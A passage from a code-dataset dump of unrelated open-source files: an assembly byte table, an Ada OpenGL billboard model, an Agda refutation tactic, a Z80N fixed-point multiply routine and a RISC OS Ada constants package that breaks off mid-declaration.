0x08,0x12,0x1C,0x25,0x2E,0x33,0x36,0x35,0x31,0x2B,0x23,0x19,0x0F,0x05,0xFD,0xF5,0xEF,0xEB,0xE7,0xE4,0xE2,0xE0,0xDE,0xDD,0xDC,0xDC,0xDE,0xE1,0xE5,0xEC,0xF4,0xFE db 0x06,0x0E,0x15,0x1C,0x21,0x24,0x26,0x25,0x22,0x1E,0x19,0x13,0x0C,0x06,0xFF,0xF9,0xF4,0xF0,0xEC,0xE8,0xE6,0xE4,0xE1,0xDF,0xDF,0xE0,0xE2,0xE5,0xE9,0xEF,0xF6,0xFE db 0x03,0x02,0x02,0x01,0x01,0x00,0xFF,0xFF,0xFF,0x0B,0x0A,0x09,0x07,0x04,0x02,0xFF,0xFD,0xFB,0xFA,0xF9,0xF9,0xFA,0xFA,0xFB,0xFD,0xFE,0x00,0x01,0x02,0x03,0x03,0x03 CODE data2: db 0x08,0x0A,0x0B,0x0D,0x0D,0x0D,0x0D,0x0C,0x0C,0x0A,0x08,0x07,0x05,0x03,0x00,0xFE,0xFB,0xF8,0xF6,0xF3,0xF0,0xEF,0xED,0xEC,0xEB,0xEB,0xEC,0xEE,0xF0,0xF4,0xF8,0xFD db 0x17,0x24,0x2E,0x35,0x37,0x37,0x34,0x2E,0x27,0x22,0x1B,0x15,0x0F,0x0B,0x07,0x02,0xFD,0xF7,0xF1,0xEB,0xE4,0xDD,0xD5,0xCE,0xC8,0xC3,0xC4,0xD2,0xDC,0xEB,0xFB,0x09 db 0x1B,0x2A,0x34,0x39,0x3A,0x38,0x32,0x2B,0x26,0x20,0x1A,0x14,0x0F,0x0B,0x06,0x03,0xFE,0xF7,0xF1,0xE9,0xE1,0xD8,0xCE,0xC5,0xBC,0xB9,0xC0,0xC8,0xD5,0xE7,0xF9,0x0D db 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3-mid/opengl/source/lean/model/opengl-model-billboard-colored_textured.adb	charlie5/lace-alire	1	1105	<filename>3-mid/opengl/source/lean/model/opengl-model-billboard-colored_textured.adb with openGL.Primitive.indexed, openGL.IO; package body openGL.Model.billboard.colored_textured is type Geometry_view is access all Geometry.colored_textured.item'Class; --------- --- Forge -- function new_Billboard (Size : in Size_t := default_Size; Plane : in billboard.Plane; Color : in lucid_Color; Texture : in asset_Name) return View is Self : constant View := new Item; begin Self.define (Size); Self.Plane := Plane; Self.Color := Color; Self.Texture_Name := Texture; return Self; end new_Billboard; -------------- --- Attributes -- overriding function to_GL_Geometries (Self : access Item; Textures : access Texture.name_Map_of_texture'Class; Fonts : in Font.font_id_Map_of_font) return Geometry.views is pragma unreferenced (Textures, Fonts); use Geometry, Geometry.colored_textured, Texture; the_Indices : aliased constant Indices := (1, 2, 3, 4); the_Sites : constant billboard.Sites := vertex_Sites (Self.Plane, Self.Width, Self.Height); function new_Face (Vertices : access Geometry.colored_textured.Vertex_array) return Geometry_view is use openGL.Primitive; the_Geometry : constant Geometry_view := Geometry.colored_textured.new_Geometry; the_Primitive : constant Primitive.view := Primitive.indexed.new_Primitive (triangle_Fan, the_Indices).all'Access; begin the_Geometry.Vertices_are (Vertices.all); the_Geometry.add (the_Primitive); the_Geometry.is_Transparent; return the_Geometry; end new_Face; Color : constant rgba_Color := +Self.Color; the_Face : Geometry_view; begin declare the_Vertices : constant access Geometry.colored_textured.Vertex_array := Self.Vertices; begin the_Vertices.all := Geometry.colored_textured.Vertex_array' (1 => (site => the_Sites (1), color => Color, coords => (Self.texture_Coords (1))), 2 => (site => the_Sites (2), color => Color, coords => (Self.texture_Coords (2))), 3 => (site => the_Sites (3), color => Color, coords => (Self.texture_Coords (3))), 4 => (site => the_Sites (4), color => Color, coords => (Self.texture_Coords (4)))); the_Face := new_Face (Vertices => the_Vertices); if Self.texture_Name /= null_Asset then Self.Texture := IO.to_Texture (Self.texture_Name); end if; if Self.Texture /= null_Object then the_Face.Texture_is (Self.Texture); end if; end; Self.Geometry := the_Face; return (1 => Geometry.view (the_Face)); end to_GL_Geometries; procedure Color_is (Self : in out Item; Now : in lucid_Color) is begin Self.Color := Now; for i in Self.Vertices'Range loop Self.Vertices (i).Color := +Now; end loop; Self.is_Modified := True; end Color_is; procedure Texture_Coords_are (Self : in out Item; Now : in Coordinates) is begin Self.texture_Coords := Now; Self.needs_Rebuild := True; end Texture_Coords_are; overriding procedure modify (Self : in out Item) is begin Self.Geometry.Vertices_are (Self.Vertices.all); Self.is_Modified := False; end modify; overriding function is_Modified (Self : in Item) return Boolean is begin return Self.is_Modified; end is_Modified; end openGL.Model.billboard.colored_textured;
src/Tactic/Nat/Refute.agda	L-TChen/agda-prelude	111	12854	<filename>src/Tactic/Nat/Refute.agda module Tactic.Nat.Refute where open import Prelude open import Builtin.Reflection open import Tactic.Reflection.Quote open import Tactic.Reflection open import Tactic.Nat.Reflect open import Tactic.Nat.NF open import Tactic.Nat.Exp open import Tactic.Nat.Auto open import Tactic.Nat.Auto.Lemmas open import Tactic.Nat.Simpl.Lemmas open import Tactic.Nat.Simpl data Impossible : Set where invalidEquation : ⊤ invalidEquation = _ refutation : ∀ {a} {A : Set a} {Atom : Set} {{_ : Eq Atom}} {{_ : Ord Atom}} eq (ρ : Env Atom) → ¬ CancelEq eq ρ → ExpEq eq ρ → A refutation exp ρ !eq eq = ⊥-elim (!eq (complicateEq exp ρ eq)) refute-tactic : Term → TC Term refute-tactic prf = inferType prf >>= λ a → caseM termToEq a of λ { nothing → pure $ failedProof (quote invalidEquation) a ; (just (eqn , Γ)) → pure $ def (quote refutation) $ vArg (` eqn) ∷ vArg (quotedEnv Γ) ∷ vArg absurd-lam ∷ vArg prf ∷ [] } macro refute : Term → Tactic refute prf hole = unify hole =<< refute-tactic prf
libsrc/_DEVELOPMENT/math/float/math32/z80/f32_z80n_mulu_32h_24x24.asm	jpoikela/z88dk	0	90577	; ; feilipu, 2019 May ; ; This Source Code Form is subject to the terms of the Mozilla Public ; License, v. 2.0. If a copy of the MPL was not distributed with this ; file, You can obtain one at http://mozilla.org/MPL/2.0/. ; ;------------------------------------------------------------------------------ ; ; multiplication of two 24-bit numbers into a 32-bit product ; ; result is calculated for highest 32-bit result ; from a 48-bit calculation. ; ; Lower 8 bits intended to provide rounding information for ; IEEE floating point mantissa calculations. ; ; enter : abc = lde = 24-bit multiplier = x ; def = lde' = 24-bit multiplicand = y ; ; abc * def ; = (ad)2^32 + ; (ae + bd)2^24 + ; (be + af + cd)2^16 + ; (bf + ce)2^8 ; ; NOT CALCULATED ; (cc)2^0 ; ; 8 88 multiplies in total ; ; exit : hlde = 32-bit product ; ; uses : af, bc, de, hl, bc', de', hl' IF __CPU_Z80N__ SECTION code_clib SECTION code_fp_math32 PUBLIC m32_mulu_32h_24x24 .m32_mulu_32h_24x24 ld h,l ; ab:bc ld l,d ld a,h ; a in a exx ld h,a push hl ; ad on stack ld h,l ; de:ef ld l,d push hl ; de on stack push de ; ef on stack ld a,h ; d in a exx ld d,a ; dc in de ld b,h ld c,l ex (sp),hl ; ab on stack, ef in HL push de ; dc on stack push bc ; ab on stack (again) push hl ; ef on stack ld d,l ld a,h ld h,e ld e,a mul de ; be 2^8 ex de,hl mul de ; cf 2^8 xor a add hl,de adc a,a ld c,h ; put 2^8 in bc ld b,a pop de ; ef pop hl ; ab ld a,d ld d,h ld h,a mul de ; af 2^16 ex de,hl mul de ; eb 2^16 xor a add hl,bc adc a,a add hl,de adc a,0 pop de ; dc mul de ; dc 2^16 add hl,de adc a,0 ld c,h ; put 2^16 in bca ld b,a ld a,l pop de ; ab pop hl ; de push af ; l on stack ld a,d ld d,h ld h,a mul de ; db 2^24 ex de,hl mul de ; ae 2^24 xor a add hl,bc adc a,a add hl,de adc a,0 pop bc ; l in b ld c,b ld b,l ld l,h ld h,a pop de ; ad mul de ; a*d 2^32 add hl,de ld d,b ld e,c ; exit : HLDE = 32-bit product ret ENDIF
source/rascal-os.ads	bracke/Meaning	0	19876	<reponame>bracke/Meaning -------------------------------------------------------------------------------- -- -- -- Copyright (C) 2004, RISC OS Ada Library (RASCAL) developers. -- -- -- -- This library is free software; you can redistribute it and/or -- -- modify it under the terms of the GNU Lesser General Public -- -- License as published by the Free Software Foundation; either -- -- version 2.1 of the License, or (at your option) any later version. -- -- -- -- This library is distributed in the hope that it will be useful, -- -- but WITHOUT ANY WARRANTY; without even the implied warranty of -- -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -- -- Lesser General Public License for more details. -- -- -- -- You should have received a copy of the GNU Lesser General Public -- -- License along with this library; if not, write to the Free Software -- -- Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -- -- -- -------------------------------------------------------------------------------- -- @brief OS events and types. Abstract task definition. -- $Author$ -- $Date$ -- $Revision$ with Kernel; use Kernel; with System; use System; with System.Unsigned_Types; use System.Unsigned_Types; with Ada.Unchecked_Conversion; package RASCAL.OS is type Event_Type is (Wimp,Message,Toolbox); type Event_Listener (K : Event_Type) is abstract tagged record Kind : Event_Type := K; end record; type Event_Pointer is access all Event_Listener'Class; procedure Handle (The : in Event_Listener) is abstract; type Byte is mod 2**8; type Wimp_Handle_Type is new Integer; type Icon_Handle_Type is new Integer; type Reason_Event_Code_Type is new System.Unsigned_Types.Unsigned; Reason_Event_NullReason : constant Reason_Event_Code_Type := 0; Reason_Event_RedrawWindow : constant Reason_Event_Code_Type := 1; Reason_Event_OpenWindow : constant Reason_Event_Code_Type := 2; Reason_Event_CloseWindow : constant Reason_Event_Code_Type := 3; Reason_Event_PointerLeavingWindow : constant Reason_Event_Code_Type := 4; Reason_Event_PointerEnteringWindow : constant Reason_Event_Code_Type := 5; Reason_Event_MouseClick : constant Reason_Event_Code_Type := 6; Reason_Event_UserDrag : constant Reason_Event_Code_Type := 7; Reason_Event_KeyPressed : constant Reason_Event_Code_Type := 8; Reason_Event_MenuSelection : constant Reason_Event_Code_Type := 9; Reason_Event_ScrollRequest : constant Reason_Event_Code_Type := 10; Reason_Event_LoseCaret : constant Reason_Event_Code_Type := 11; Reason_Event_GainCaret : constant Reason_Event_Code_Type := 12; Reason_Event_PollWordNonZero : constant Reason_Event_Code_Type := 13; Reason_Event_UserMessage : constant Reason_Event_Code_Type := 17; Reason_Event_UserMessageRecorded : constant Reason_Event_Code_Type := 18; Reason_Event_UserMessageAcknowledge : constant Reason_Event_Code_Type := 19; Reason_Event_ToolboxEvent : constant Reason_Event_Code_Type := 16#200#; type Wimp_EventListener (E : Reason_Event_Code_Type; W : Wimp_Handle_Type; I : Icon_Handle_Type) is abstract new Event_Listener(Wimp) with record Event_Code : Reason_Event_Code_Type := E; Window : Wimp_Handle_Type := W; Icon : Icon_Handle_Type := I; end record; type Message_Event_Code_Type is new System.Unsigned_Types.Unsigned; Message_Event_Quit : constant Message_Event_Code_Type := 0; Message_Event_DataSave : constant Message_Event_Code_Type := 1; Message_Event_DataSaveAck : constant Message_Event_Code_Type := 2; Message_Event_DataLoad : constant Message_Event_Code_Type := 3; Message_Event_DataLoadAck : constant Message_Event_Code_Type := 4; Message_Event_DataOpen : constant Message_Event_Code_Type := 5; Message_Event_RAMFetch : constant Message_Event_Code_Type := 6; Message_Event_RAMTransmit : constant Message_Event_Code_Type := 7; Message_Event_PreQuit : constant Message_Event_Code_Type := 8; Message_Event_PaletteChange : constant Message_Event_Code_Type := 9; Message_Event_SaveDesktop : constant Message_Event_Code_Type := 10; Message_Event_DeviceClaim : constant Message_Event_Code_Type := 11; Message_Event_DeviceInUse : constant Message_Event_Code_Type := 12; Message_Event_DataSaved : constant Message_Event_Code_Type := 13; Message_Event_Shutdown : constant Message_Event_Code_Type := 14; Message_Event_FilerOpenDir : constant Message_Event_Code_Type := 16#400#; Message_Event_FilerCloseDir : constant Message_Event_Code_Type := 16#401#; Message_Event_FilerOpenDirAt : constant Message_Event_Code_Type := 16#402#; Message_Event_FilerSelectionDirectory: constant Message_Event_Code_Type := 16#403#; Message_Event_FilerAddSelection : constant Message_Event_Code_Type := 16#404#; Message_Event_FilerAction : constant Message_Event_Code_Type := 16#405#; Message_Event_FilerControlAction : constant Message_Event_Code_Type := 16#406#; Message_Event_FilerSelection : constant Message_Event_Code_Type := 16#407#; Message_Event_AlarmSet : constant Message_Event_Code_Type := 16#500#; Message_Event_AlarmGoneOff : constant Message_Event_Code_Type := 16#501#; Message_Event_HelpEnable : constant Message_Event_Code_Type := 16#504#; Message_Event_Notify : constant Message_Event_Code_Type := 16#40040#; Message_Event_MenuWarning : constant Message_Event_Code_Type := 16#400c0#; Message_Event_ModeChange : constant Message_Event_Code_Type := 16#400c1#; Message_Event_TaskInitialise : constant Message_Event_Code_Type := 16#400c2#; Message_Event_TaskCloseDown : constant Message_Event_Code_Type := 16#400c3#; Message_Event_SlotSize : constant Message_Event_Code_Type := 16#400c4#; Message_Event_SetSlot : constant Message_Event_Code_Type := 16#400c5#; Message_Event_TaskNameRq : constant Message_Event_Code_Type := 16#400c6#; Message_Event_TaskNameIs : constant Message_Event_Code_Type := 16#400c7#; Message_Event_TaskStarted : constant Message_Event_Code_Type := 16#400c8#; Message_Event_MenusDeleted : constant Message_Event_Code_Type := 16#400c9#; Message_Event_Iconize : constant Message_Event_Code_Type := 16#40c10#; Message_Event_IconizeAt : constant Message_Event_Code_Type := 16#400D0#; Message_Event_WindowInfo : constant Message_Event_Code_Type := 16#40c11#; Message_Event_WindowClosed : constant Message_Event_Code_Type := 16#40c12#; Message_Event_FontChanged : constant Message_Event_Code_Type := 16#400CF#; Message_Event_PrintFile : constant Message_Event_Code_Type := 16#80140#; Message_Event_WillPrint : constant Message_Event_Code_Type := 16#80141#; Message_Event_PrintSave : constant Message_Event_Code_Type := 16#80142#; Message_Event_PrintInit : constant Message_Event_Code_Type := 16#80143#; Message_Event_PrintError : constant Message_Event_Code_Type := 16#80144#; Message_Event_PrintTypeOdd : constant Message_Event_Code_Type := 16#80145#; Message_Event_PrintTypeKnown : constant Message_Event_Code_Type := 16#80146#; Message_Event_SetPrinter : constant Message_Event_Code_Type := 16#80147#; Message_Event_PSPrinterQuery : constant Message_Event_Code_Type := 16#8014c#; Message_Event_PSPrinterAck : constant Message_Event_Code_Type := 16#8014d#; Message_Event_PSPrinterModified : constant Message_Event_Code_Type := 16#8014e#; Message_Event_PSPrinterDefaults : constant Message_Event_Code_Type := 16#8014f#; Message_Event_PSPrinterDefaulted : constant Message_Event_Code_Type := 16#80150#; Message_Event_PSPrinterNotPS : constant Message_Event_Code_Type := 16#80151#; Message_Event_ResetPrinter : constant Message_Event_Code_Type := 16#80152#; Message_Event_PSIsFontPrintRunning : constant Message_Event_Code_Type := 16#80153#; Message_Event_HelpRequest : constant Message_Event_Code_Type := 16#502#; Message_Event_HelpReply : constant Message_Event_Code_Type := 16#503#; Message_Event_Help_Word : constant Message_Event_Code_Type := 16#43B00#; Message_Event_TW_Input : constant Message_Event_Code_Type := 16#808C0#; Message_Event_TW_Output : constant Message_Event_Code_Type := 16#808C1#; Message_Event_TW_Ego : constant Message_Event_Code_Type := 16#808C2#; Message_Event_TW_Morio : constant Message_Event_Code_Type := 16#808C3#; Message_Event_TW_Morite : constant Message_Event_Code_Type := 16#808C4#; Message_Event_TW_NewTask : constant Message_Event_Code_Type := 16#808C5#; Message_Event_TW_Suspend : constant Message_Event_Code_Type := 16#808C6#; Message_Event_TW_Resume : constant Message_Event_Code_Type := 16#808C7#; Message_Event_PlugInQuit : constant Message_Event_Code_Type := 16#50D80#; Message_Event_PlugInQuitContinue : constant Message_Event_Code_Type := 16#50D81#; Message_Event_PlugInQuitAbort : constant Message_Event_Code_Type := 16#50D82#; Message_Event_OpenConfigWindow : constant Message_Event_Code_Type := 16#50D83#; Message_Event_Bugz_Query : constant Message_Event_Code_Type := 16#53B80#; Message_Event_Bugz_BugzFile : constant Message_Event_Code_Type := 16#53B81#; Message_Event_OLE_FileChanged : constant Message_Event_Code_Type := 16#80E1E#; Message_Event_OLEOpenSession : constant Message_Event_Code_Type := 16#80E21#; Message_Event_OLEOpenSessionAck : constant Message_Event_Code_Type := 16#80E22#; Message_Event_OLECloseSession : constant Message_Event_Code_Type := 16#80E23#; Message_Event_ConfiX : constant Message_Event_Code_Type := 16#40D50#; Message_Event_StrongEDModeFileChanged : constant Message_Event_Code_Type := 16#43b06#; Message_Event_StrongEDInsertText : constant Message_Event_Code_Type := 16#43b04#; Message_Event_InetSuite_Open_URL : constant Message_Event_Code_Type := 16#4AF80#; type Message_EventListener (E : Message_Event_Code_Type) is abstract new Event_Listener(Message) with record Event_Code : Message_Event_Code_Type := E; end record; type Message_Event_Header is record Size : System.Unsigned_Types.Unsigned; Sender : Integer; MyRef : System.Unsigned_Types.Unsigned; YourRef : System.Unsigned_Types.Unsigned; Event_Code : Message_Event_Code_Type; end record; pragma Convention (C, Message_Event_Header); type ToolBox_Event_Code_Type is new System.Unsigned_Types.Unsigned; Toolbox_Event_Error : constant ToolBox_Event_Code_Type := 16#44EC0#; Toolbox_Event_ObjectAutoCreated : constant ToolBox_Event_Code_Type := 16#44EC1#; Toolbox_Event_ObjectDeleted : constant ToolBox_Event_Code_Type := 16#44EC2#; Toolbox_Event_Menu_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#828C0#; Toolbox_Event_Menu_HasBeenHidden : constant ToolBox_Event_Code_Type := 16#828C1#; Toolbox_Event_Menu_SubMenu : constant ToolBox_Event_Code_Type := 16#828C2#; Toolbox_Event_Menu_Selection : constant ToolBox_Event_Code_Type := 16#828C3#; Toolbox_Event_ColourDbox_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#829C0#; Toolbox_Event_ColourDbox_DialogueCompleted : constant ToolBox_Event_Code_Type := 16#829C1#; Toolbox_Event_ColourDbox_ColourSelected : constant ToolBox_Event_Code_Type := 16#829C2#; Toolbox_Event_ColourDbox_ColourChanged : constant ToolBox_Event_Code_Type := 16#829C3#; Toolbox_Event_ColourMenu_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82980#; Toolbox_Event_ColourMenu_HasBeenHidden : constant ToolBox_Event_Code_Type := 16#82981#; Toolbox_Event_ColourMenu_Selection : constant ToolBox_Event_Code_Type := 16#82982#; Toolbox_Event_DCS_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82A80#; Toolbox_Event_DCS_Discard : constant ToolBox_Event_Code_Type := 16#82A81#; Toolbox_Event_DCS_Save : constant ToolBox_Event_Code_Type := 16#82A82#; Toolbox_Event_DCS_DialogueCompleted : constant ToolBox_Event_Code_Type := 16#82A83#; Toolbox_Event_DCS_Cancel : constant ToolBox_Event_Code_Type := 16#82A84#; Toolbox_Event_FileInfo_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82AC0#; Toolbox_Event_FileInfo_DialogueCompleted : constant ToolBox_Event_Code_Type := 16#82AC1#; Toolbox_Event_FontDbox_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82A00#; Toolbox_Event_FontDbox_DialogueCompleted : constant ToolBox_Event_Code_Type := 16#82A01#; Toolbox_Event_FontDbox_ApplyFont : constant ToolBox_Event_Code_Type := 16#82A02#; Toolbox_Event_FontMenu_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82A40#; Toolbox_Event_FontMenu_HasBeenHidden : constant ToolBox_Event_Code_Type := 16#82A41#; Toolbox_Event_FontMenu_Selection : constant ToolBox_Event_Code_Type := 16#82A42#; Toolbox_Event_Iconbar_Clicked : constant ToolBox_Event_Code_Type := 16#82900#; Toolbox_Event_Iconbar_SelectAboutToBeShown : constant ToolBox_Event_Code_Type := 16#82901#; Toolbox_Event_Iconbar_AdjustAboutToBeShown : constant ToolBox_Event_Code_Type := 16#82902#; Toolbox_Event_PrintDbox_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82B00#; Toolbox_Event_PrintDbox_DialogueCompleted : constant ToolBox_Event_Code_Type := 16#82B01#; Toolbox_Event_PrintDbox_SetupAboutToBeShown : constant ToolBox_Event_Code_Type := 16#82B02#; Toolbox_Event_PrintDbox_Save : constant ToolBox_Event_Code_Type := 16#82B03#; Toolbox_Event_PrintDbox_SetUp : constant ToolBox_Event_Code_Type := 16#82B04#; Toolbox_Event_PrintDbox_Print : constant ToolBox_Event_Code_Type := 16#82B05#; Toolbox_Event_ProgInfo_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82B40#; Toolbox_Event_ProgInfo_DialogueCompleted : constant ToolBox_Event_Code_Type := 16#82B41#; Toolbox_Event_ProgInfo_LaunchWebPage : constant ToolBox_Event_Code_Type := 16#82B42#; Toolbox_Event_Quit_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82A90#; Toolbox_Event_Quit_Quit : constant ToolBox_Event_Code_Type := 16#82A91#; Toolbox_Event_Quit_DialogueCompleted : constant ToolBox_Event_Code_Type := 16#82A92#; Toolbox_Event_Quit_Cancel : constant ToolBox_Event_Code_Type := 16#82A93#; Toolbox_Event_SaveAs_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82BC0#; Toolbox_Event_SaveAs_DialogueCompleted : constant ToolBox_Event_Code_Type := 16#82BC1#; Toolbox_Event_SaveAs_SaveToFile : constant ToolBox_Event_Code_Type := 16#82BC2#; Toolbox_Event_SaveAs_FillBuffer : constant ToolBox_Event_Code_Type := 16#82BC3#; Toolbox_Event_SaveAs_SaveCompleted : constant ToolBox_Event_Code_Type := 16#82BC4#; Toolbox_Event_Scale_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82C00#; Toolbox_Event_Scale_DialogueCompleted : constant ToolBox_Event_Code_Type := 16#82C01#; Toolbox_Event_Scale_ApplyFactor : constant ToolBox_Event_Code_Type := 16#82C02#; Toolbox_Event_Window_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#82880#; Toolbox_Event_ActionButton_Selected : constant ToolBox_Event_Code_Type := 16#82881#; Toolbox_Event_OptionButton_StateChanged : constant ToolBox_Event_Code_Type := 16#82882#; Toolbox_Event_RadioButton_StateChanged : constant ToolBox_Event_Code_Type := 16#82883#; Toolbox_Event_DisplayField_ValueChanged : constant ToolBox_Event_Code_Type := 16#82884#; Toolbox_Event_WritableField_ValueChanged : constant ToolBox_Event_Code_Type := 16#82885#; Toolbox_Event_Slider_ValueChanged : constant ToolBox_Event_Code_Type := 16#82886#; Toolbox_Event_Draggable_DragStarted : constant ToolBox_Event_Code_Type := 16#82887#; Toolbox_Event_Draggable_DragEnded : constant ToolBox_Event_Code_Type := 16#82888#; Toolbox_Event_PopUp_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#8288B#; Toolbox_Event_Adjuster_Clicked : constant ToolBox_Event_Code_Type := 16#8288C#; Toolbox_Event_NumberRange_ValueChanged : constant ToolBox_Event_Code_Type := 16#8288D#; Toolbox_Event_StringSet_ValueChanged : constant ToolBox_Event_Code_Type := 16#8288E#; Toolbox_Event_StringSet_AboutToBeShown : constant ToolBox_Event_Code_Type := 16#8288F#; Toolbox_Event_Window_HasBeenHidden : constant ToolBox_Event_Code_Type := 16#82890#; ToolBox_Event_Quit : constant ToolBox_Event_Code_Type := 16#82A91#; Toolbox_Event_ScrollList_Selection : constant ToolBox_Event_Code_Type := 16#140181#; Toolbox_Event_Scrollbar_PositionChanged : constant ToolBox_Event_Code_Type := 16#140183#; Toolbox_Event_ToolAction_ButtonClicked : constant ToolBox_Event_Code_Type := 16#140140#; TreeView_SWIBase : constant ToolBox_Event_Code_Type := 16#140280#; TreeView_EventBase : constant ToolBox_Event_Code_Type := TreeView_SWIBase; Toolbox_Event_TreeViewNodeSelected : constant ToolBox_Event_Code_Type := TreeView_EventBase + 0; Toolbox_Event_TreeViewNodeExpanded : constant ToolBox_Event_Code_Type := TreeView_EventBase + 1; Toolbox_Event_TreeViewNodeRenamed : constant ToolBox_Event_Code_Type := TreeView_EventBase + 2; Toolbox_Event_TreeViewNodeDataRequired : constant ToolBox_Event_Code_Type := TreeView_EventBase + 3; Toolbox_Event_TreeViewNodeDragged : constant ToolBox_Event_Code_Type := TreeView_EventBase + 4; type Object_ID is new Integer; type Component_ID is new Integer; subtype Error_Code_Type is Integer; Error_Escape : constant Error_Code_Type := 16#11#; Error_Bad_mode : constant Error_Code_Type := 16#19#; Error_Is_adir : constant Error_Code_Type := 16#A8#; Error_Types_dont_match : constant Error_Code_Type := 16#AF#; Error_Bad_rename : constant Error_Code_Type := 16#B0#; Error_Bad_copy : constant Error_Code_Type := 16#B1#; Error_Outside_file : constant Error_Code_Type := 16#B7#; Error_Access_violation : constant Error_Code_Type := 16#BD#; Error_Too_many_open_files : constant Error_Code_Type := 16#C0#; Error_Not_open_for_update : constant Error_Code_Type := 16#C1#; Error_File_open : constant Error_Code_Type := 16#C2#; Error_Object_locked : constant Error_Code_Type := 16#C3#; Error_Already_exists : constant Error_Code_Type := 16#C4#; Error_Bad_file_name : constant Error_Code_Type := 16#CC#; Error_File_not_found : constant Error_Code_Type := 16#D6#; Error_Syntax : constant Error_Code_Type := 16#DC#; Error_Channel : constant Error_Code_Type := 16#DE#; Error_End_of_file : constant Error_Code_Type := 16#DF#; Error_Buffer_Overflow : constant Error_Code_Type := 16#E4#; Error_Bad_filing_system_name : constant Error_Code_Type := 16#F8#; Error_Bad_key : constant Error_Code_Type := 16#FB#; Error_Bad_address : constant Error_Code_Type := 16#FC#; Error_Bad_string : constant Error_Code_Type := 16#FD#; Error_Bad_command : constant Error_Code_Type := 16#FE#; Error_Bad_mac_val : constant Error_Code_Type := 16#120#; Error_Bad_var_nam : constant Error_Code_Type := 16#121#; Error_Bad_var_type : constant Error_Code_Type := 16#122#; Error_Var_no_room : constant Error_Code_Type := 16#123#; Error_Var_cant_find : constant Error_Code_Type := 16#124#; Error_Var_too_long : constant Error_Code_Type := 16#125#; Error_Redirect_fail : constant Error_Code_Type := 16#140#; Error_Stack_full : constant Error_Code_Type := 16#141#; Error_Bad_hex : constant Error_Code_Type := 16#160#; Error_Bad_expr : constant Error_Code_Type := 16#161#; Error_Bad_bra : constant Error_Code_Type := 16#162#; Error_Stk_oflo : constant Error_Code_Type := 16#163#; Error_Miss_opn : constant Error_Code_Type := 16#164#; Error_Miss_opr : constant Error_Code_Type := 16#165#; Error_Bad_bits : constant Error_Code_Type := 16#166#; Error_Str_oflo : constant Error_Code_Type := 16#167#; Error_Bad_itm : constant Error_Code_Type := 16#168#; Error_Div_zero : constant Error_Code_Type := 16#169#; Error_Bad_base : constant Error_Code_Type := 16#16A#; Error_Bad_numb : constant Error_Code_Type := 16#16B#; Error_Numb_too_big : constant Error_Code_Type := 16#16C#; Error_Bad_claim_num : constant Error_Code_Type := 16#1A1#; Error_Bad_release : constant Error_Code_Type := 16#1A2#; Error_Bad_dev_no : constant Error_Code_Type := 16#1A3#; Error_Bad_dev_vec_rel : constant Error_Code_Type := 16#1A4#; Error_Bad_env_number : constant Error_Code_Type := 16#1B0#; Error_Cant_cancel_quit : constant Error_Code_Type := 16#1B1#; Error_Ch_dynam_cao : constant Error_Code_Type := 16#1C0#; Error_Ch_dynam_not_all_moved : constant Error_Code_Type := 16#1C1#; Error_Apl_wspace_in_use : constant Error_Code_Type := 16#1C2#; Error_Ram_fs_unchangeable : constant Error_Code_Type := 16#1C3#; Error_Oscli_long_line : constant Error_Code_Type := 16#1E0#; Error_Oscli_too_hard : constant Error_Code_Type := 16#1E1#; Error_Rc_exc : constant Error_Code_Type := 16#1E2#; Error_Sys_heap_full : constant Error_Code_Type := 16#1E3#; Error_Buff_overflow : constant Error_Code_Type := 16#1E4#; Error_Bad_time : constant Error_Code_Type := 16#1E5#; Error_No_such_swi : constant Error_Code_Type := 16#1E6#; Error_Unimplemented : constant Error_Code_Type := 16#1E7#; Error_Out_of_range : constant Error_Code_Type := 16#1E8#; Error_No_oscli_specials : constant Error_Code_Type := 16#1E9#; Error_Bad_parameters : constant Error_Code_Type := 16#1EA#; Error_Arg_repeated : constant Error_Code_Type := 16#1EB#; Error_Bad_read_sys_info : constant Error_Code_Type := 16#1EC#; Error_Cdat_stack_overflow : constant Error_Code_Type := 16#2C0#; Error_Cdat_buffer_overflow : constant Error_Code_Type := 16#2C1#; Error_Cdat_bad_field : constant Error_Code_Type := 16#2C2#; Error_Cant_start_application : constant Error_Code_Type := 16#600#; -- Toolbox errors Error_Tool_Action_Out_of_Memory : constant Error_Code_Type := 16#80E920#; Error_Tool_Action_Cant_Create_Icon : constant Error_Code_Type := 16#80E921#; Error_Tool_Action_Cant_Create_Object : constant Error_Code_Type := 16#80E922#; Exception_Tool_Action_Out_of_Memory : Exception; Exception_Tool_Action_Cant_Create_Icon : Exception; Exception_Tool_Action_Cant_Create_Object: Exception; Exception_Escape : Exception; Exception_Bad_mode : Exception; Exception_Is_adir : Exception; Exception_Types_dont_match : Exception; Exception_Bad_rename : Exception; Exception_Bad_copy : Exception; Exception_Outside_file : Exception; Exception_Access_violation : Exception; Exception_Too_many_open_files : Exception; Exception_Not_open_for_update : Exception; Exception_File_open : Exception; Exception_Object_locked : Exception; Exception_Already_exists : Exception; Exception_Bad_file_name : Exception; Exception_File_not_found : Exception; Exception_Syntax : Exception; Exception_Channel : Exception; Exception_End_of_file : Exception; Exception_Buffer_Overflow : Exception; Exception_Bad_filing_system_name : Exception; Exception_Bad_key : Exception; Exception_Bad_address : Exception; Exception_Bad_string : Exception; Exception_Bad_command : Exception; Exception_Bad_mac_val : Exception; Exception_Bad_var_nam : Exception; Exception_Bad_var_type : Exception; Exception_Var_no_room : Exception; Exception_Var_cant_find : Exception; Exception_Var_too_long : Exception; Exception_Redirect_fail : Exception; Exception_Stack_full : Exception; Exception_Bad_hex : Exception; Exception_Bad_expr : Exception; Exception_Bad_bra : Exception; Exception_Stk_oflo : Exception; Exception_Miss_opn : Exception; Exception_Miss_opr : Exception; Exception_Bad_bits : Exception; Exception_Str_oflo : 